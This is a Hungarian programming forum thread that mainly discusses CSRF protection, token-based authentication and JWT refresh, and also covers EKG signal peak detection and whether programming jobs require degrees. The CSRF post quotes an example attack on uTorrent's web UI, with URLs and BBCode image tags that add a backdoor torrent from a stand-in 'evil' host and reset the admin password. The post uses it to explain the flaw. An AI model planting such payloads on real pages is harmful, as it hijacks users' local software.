A CSRF védelem lényege, hogy minden hívásnál random (vagy csak nagyon rövid ideig - egy oldal életciklusáig - él). A tokent nem cookie-ban vagy más lokális store-ban tároljuk, hanem a lap kódjában kerül eltárolásban (legtöbbször hidden form field-ben, mert lekérésnél vissza kell adni a szervernek). A védelem lényege az, hogy a felhasználó nevében nem lehet olyan kérést indítani, aminek a "forrása" nem a kérdéses weboldal.
Illetve a fenti megoldás a "secure" mód - de ez elcseszi a vissza-gomb működését ("CSRF Failure"-t hibát generál), legtöbbször - alacsonyabb biztonsági szinthez, session-élettartamú CSRF-tokent generálnak.
Ennek a védelemnek egyébként az a feltétele, hogy atámadó ne tudja megszerezni a session/csrf token-t (azaz ne legyen az alkalmazásban XSS sebezhetőség - vagy az alkalmazás csrf token segítségével ezonosítsa a felhasználót ne csak session cookie és/vagy kliens ip alapján).
Jó példa erre (wikiből) az alábbi uTorrent sebezhetőség:
Torrent letöltés hozzáadása:
http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent
uTorrent administrator password megváltoztatása
http://localhost:8080/gui/?action=setsetting&s=webui.password&v=eviladminCSRF támadó kód simán kivitelezhető pl egy IMG tag hozzáadásával, ami a sebezhető címre mutat (BBCode):
[img]http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent[/img]
vagy ide a PH-ra:[IMG:http://localhost:8080/gui/?action=add-url&s=http://evil.example.com/backdoor.torrent][/IMG]
[ Szerkesztve ]
-
bandi0000
nagyúr
válasz #68216320 #12730 üzenetére
Nem akarlak elkeseríteni de nem
Én már pár hete küzdök vele, de nem nagyon jövök rá a jó megoldásra, mert a vége mindig az, hogy ha ellopják a tokent, akkor baj van
Ha már úgy is feljött akkor hátha tud valaki mondani nekem okosat
Én is alapjába JWT-t használok, de azt szeretném, ha a felhasználónak nem kellene bejelentkeznie megint ha aktívan használja az oldalt, erre gondoltam, hogy minden kérésnél kap új tokent, vagy szebb lenne figyelni kliensen, hogy ha lejárt a token, akkor már a refresh tokennel kér egy új access tokent...
De itt megint az a baj, hogy ha kikerül valamelyik token, akkor gond van, ajánlották még a CSRF/XSRF tokent, erről mi a véleményetek? Mert ennek is utána jártam de nem áll össze a kép, hogy miért lenne biztonságosabb
Vagy ha teljesen más a megoldás, akkor mit ajánlanátok?
-
sztanozs
veterán
válasz #68216320 #12728 üzenetére
Nézd meg, hogy működik egy ilyen keretrendszer (pl OAuth, OpenID, ...) és próbáld meg implementálni.
-
törölt tag
Sziasztok. Módszertani segítségre lenne szükségem token alapú authentikációhoz.
Szeretnék egy saját programba user login részt csinálni.
Hogyan kell ezt megvalósítani?Arra gondoltam, hogy lenne egy User object és egy Auth object.
A User tartalmazná a név, login, születés, stb. adatokat
Az Auth tartalmazná a jelszó, token-string adatokat.Igazából a probléma az, hogy nem tudom miként működik a token létrehozás és ellnörzés.
Arra gondoltam, hogy belépéskor, ha a jelszó valid, akkor generálnék egy token-t és ezt tárolnám az object-ben.
Aztán minden műveletnél elküldeném a kéréssel együtt és ellenőrizném, hogy rendben van-e és mehet-e a művelet.Nagyon melléfogás így? Hogyan kellene működni egy ilyen rendszernek? Egyáltalán a token csak egy unique string vagy van valami komplexebb szerkezete?
[ Szerkesztve ]
-
kobe24
tag
válasz MATEO6600 #12717 üzenetére
Sziasztok.
Abban kérném a segítségeteket, hogy tudnátok-e olyan feladatot/problémát mondani, amivel jól lehet reprezentálni a soros-párhuzamos feldolgozás közötti sebességkülönbséget? Valami érdekes feladatot próbálok a témában találni, de eddig nem sok minden jutott eszembe. Köszönöm a segítségeteket. -
kovisoft
őstag
válasz MATEO6600 #12715 üzenetére
Még néhány ötlet, bár valószínűleg már ezekre is gondoltál már:
(1) Amplitúdó tengelyen normalizáció, hogy a maximális kitérés mindig ugyanakkora legyen (persze csak a csúcsok helyének meghatározásához).
(2) Időtengelyen (ha a peak detection algoritmusod valamilyen ablakmérettel dolgozik): szintén fourier transzformációval meghatározni a karakterisztikus periódushosszt, és ehhez igazítani az ablakméretet.
(3) MP3 konverzióhoz hasonlóan szeletekre osztani az idősort, és egy-egy szeleten belül (naná hogy szintén fourier transzformációval ) frekvencia-összetevőkre bontani a mintát, a kis amplitúdójú összetevőket kihajítani, a maradékból visszaállított mintában talán könnyebb csúcsokat keresni.
-
kovisoft
őstag
válasz MATEO6600 #12707 üzenetére
Csak egy ötlet: az egyenetlen (de amúgy kváziperiodikus) jelet ki lehet simítani úgy, hogy valamilyen diszkrét fourier transzformációt ráeresztve kivesszük az alacsony frekvenciás komponenseket, majd inverz fourier transzformációval visszalakítjuk. Lehet, hogy ez már önmagában is eleget simít ahhoz, hogy működjön a peak detection algoritmusod.
-
-
MATEO6600
őstag
Én is ezt gondoltam
Egészen jól kezelhető, kivéve a problémás részeket. Na de épp azok az érdekesek...De egyébként ez egy általánosan kiterjeszthető probléma is:
Adott egy detektáló algoritmus, ami bizonyos inputokon jól működik, adott paraméterekkel.
Azonban jelentősen eltérő inputra jelentősen eltérő paraméterekkel ad megfelelő eredményt.
Kérdés, hogy akkor hogy paraméterezze az ember az algoritmust? Mivel túl nagy a szórás az inputok között, ezért nem létezik "joker", mindenre jó eredményt produkáló paraméterkészlet. Véleményem szerint ilyenkor jönne be az AI a képbe, csak nem tudom pontosan milyen téren keresgéljek. Genetikus algoritmussal már próbálkoztam, működik, de nem adot elég robosztus eredményt. -
opr
nagyúr
válasz MATEO6600 #12709 üzenetére
Hmmmm, fura. Azt gondolna az ember, hogy egy ~barmilyen EKG sima statisztikai modszerekkel elemezheto, de ezek szerint nem ennyire trivialis.
-
opr
nagyúr
válasz MATEO6600 #12707 üzenetére
Ha a jel EKG szeru, akkor nekem viszonylag fajdalommentes megoldasnak tunik az adatok alapjan szamolni egy atlagos erteket felfele es lefele is, (ha sok az adat, valami mintavetelt hasznalni, vannak erre okossagok, talan meg ingyenes/open source lib-ek is) es ami a felett vagy alatt van x% tureshatarral megkuldve, az peak.
Es akkor barmilyen inputon mukodik a cucc, bar az init lassabb lesz, mint most. Igy valtoztathato parametered csak a tolerancia lesz, de az meg mar annyira nem tunik nehezen belohetonek.[ Szerkesztve ]
-
MATEO6600
őstag
Üdv!
Egy technikai kérdésem lenne:
Adott egy hosszú EKG jel, ahol peakdetectet hajtottam végre.
Gyakorlatilag tökéletesen sikerül is, azonban, ha beadok egy másik jelet, és azon hajtom végre az algoritmust, elhasal. Át kell paramétereznem, és akkor ugyanúgy jó eredményt kapok.
Itt jön a kérdés: milyen programozási módszerrel lehetne kiküszöbölni, hogy ne kelljen minden új inputnál kézileg új paramétert beadnom?
Én valami AI/Machine Learning technikára gondoltam, de nem tudom pontosan milyen lenne hasznos. -
martonx
veterán
válasz V.Stryker #12703 üzenetére
Általánosságban egy felsőfokú végzettséget azért el szoktak várni, de azt már nem, hogy az célirányos is legyen. Azaz pl. egyetemi diplomás biológusként simán dolgozhatsz programozóként, de 8 általánossal ritkán jutsz túl már a legelső HR-es szűrőjén is.
Én kérek elnézést!
-
V.Stryker
nagyúr
Sziasztok,
Feltételezem, hogy ebben a topikban többen dolgoznak programozóként, így főként tőlük is kérdezném, hogy ebben a szakmában mennyire ragaszkodnak a munkaadók a papíros végzettséghez? Sok sulinál látom, hogy ilyen mindenhol használható OKJ papírt SEM ad, viszont tudást igen. Ez ténylegesen elegendő lenne ebben a szakmában? Nekem is több ismerősöm van, akinek nincs papírja, de csinálja...
-
-
opr
nagyúr
válasz #78600448 #12699 üzenetére
Tehat ha jol ertem, akkor sajat magad altal tervezett es epitett automata emesztogodoraso-droid vezerlesehez szeretnel alkalmazast irni, ami soros porton kommunikal.
C/C++/Assembly nyelveket tudom ajanlani.
Ha szeretnel neki valami user-friendly GUI-t, akkor meg a QT C++-t celozd meg."Programozó vagyok. Ez azt jelenti, hogy amit leírok, megtörténik." :D “The only valid measurement of code quality is What-The-F**ks/Minute.” - Robert Martin
Új hozzászólás Aktív témák
Hirdetés
● olvasd el a téma összefoglalót!
- HP Zbook Fury 15 G8, RTX A5000 16GB, I7-11850H, 32GB RAM, 1TB NVME, Magyar
- Apple iPhone 7 128GB, Kártyafüggetlen, 1 Év Garanciával
- Apple iPhone 14 Pro 128GB, Kártyafüggetlen, 1 Év Garanciával
- Apple iPhone 13 Pro 128GB, Kártyafüggetlen, 1 Év Garanciával
- Rpaspberry PI 4 8GB RAM, X825-C8 ház, X735 Tápvezérlő Hat, X862 m.2 SSD Hat, WD 240 GB m.2 SSD-vel
Állásajánlatok
Cég: Axon Labs Kft.
Város: Budapest
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest